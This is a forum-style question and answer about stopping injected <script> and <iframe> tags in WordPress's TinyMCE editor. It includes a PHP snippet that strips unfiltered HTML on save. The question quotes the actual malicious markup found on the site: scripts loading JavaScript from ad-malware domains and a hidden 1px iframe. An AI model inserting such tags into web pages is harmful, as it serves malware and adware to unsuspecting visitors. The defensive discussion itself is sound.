How do I disable/disallow <script> and <iframe> tags in TinyMCE?

A client of mine has just had 200 posts injected by malicious scripts and iframes. The website is now all cleared.

They were put in the content by the user updating the post/page, as my client's computer was infected. (Though only in the TinyMCE editor – not in any of the other custom fields assigned to the particular page/posts.)

The exact scripts for this website looked like the ones below:

<script src="https://serverads.net/599b47260394deb2d8.js"></script>
<script src="https://pulseadnetwork.com/a/display.php?r=1131815"></script>
<script src="http://serverads.net/addons/lnkr5.min.js" type="text/javascript"></script>

The iframes looked like this:

<iframe style="position: absolute; left: -1000px; top: -1000px; width: 1px; height: 1px; visibility: hidden; border: none; background-color: transparent;" src="https://pulseadnetwork.com/pix.html"></iframe>

To prevent this from happening in the future, is it possible to completely disable/disallow scripts and iframes in the TinyMCE editor in WordPress?

WordPress version: 4.4.2

And yes, I know – this won't fix my client's computer. But I am hoping that it most certainly will prevent the malicious code from populating the TinyMCE editor and spamming my client's website visitors in the future.

1 Answer

Simple way: do not add content when logged in as an admin user, but only as an author. If you want to go somewhat extreme, remove the posting capabilities from the admin. Not sure where that will leave you with editing slugs, so a proper check of permissions will be needed.

This answers your question, as author users are not allowed to add scripts and iframes into content, but... if the computer of the person with the admin permissions is not secure, then you are doomed whatever you do, as the hacker can use the login to give himself whatever permissions he likes, or even just make DB-level changes without going via the WP APIs at all.
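A less drastic variant of the same idea, as an added example that is not from the question or the answer above: instead of taking posting rights away from the admin, take away only the `unfiltered_html` capability, so that WordPress runs every saved post body through its `wp_kses_post()` allow-list (which contains neither `<script>` nor `<iframe>`) regardless of who is logged in. It assumes a stock WordPress install where the file is dropped into `wp-content/mu-plugins/`.

```php
<?php
/**
 * Plugin Name: Disallow unfiltered HTML for all users
 * Description: Drop-in for wp-content/mu-plugins/ (must-use plugins cannot be
 *              deactivated from the dashboard). Added example; not code from
 *              the original question or answer.
 */

// 1. Deny the 'unfiltered_html' meta capability to every user, administrators
//    included. When the current user lacks it, kses_init() (wp-includes/kses.php)
//    hooks wp_filter_post_kses() onto 'content_save_pre', so post content is
//    passed through wp_kses_post() before it reaches the database. The default
//    'post' allow-list has no <script> or <iframe>, so tags like the ones in
//    the question are stripped on save; only their inner text (if any) survives.
//    Equivalent one-liner for wp-config.php: define( 'DISALLOW_UNFILTERED_HTML', true );
add_filter( 'map_meta_cap', function ( $caps, $cap ) {
    if ( 'unfiltered_html' === $cap ) {
        return array( 'do_not_allow' );
    }
    return $caps;
}, 10, 2 );

// 2. Belt and braces: sanitise on save even if another plugin later re-grants
//    unfiltered_html. 'content_save_pre' receives slashed data and
//    wp_kses_post() expects unslashed data, hence the unslash/slash pair
//    (the same thing wp_filter_post_kses() does with stripslashes/addslashes).
add_filter( 'content_save_pre', function ( $content ) {
    return wp_slash( wp_kses_post( wp_unslash( $content ) ) );
}, 5 );
```

Note that this also strips raw `<iframe>` embeds that legitimate editors may have been pasting (video players and the like); oEmbed URLs on their own line keep working because they are expanded at render time, not stored as markup. Content already in the database is not touched; only future saves are filtered.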
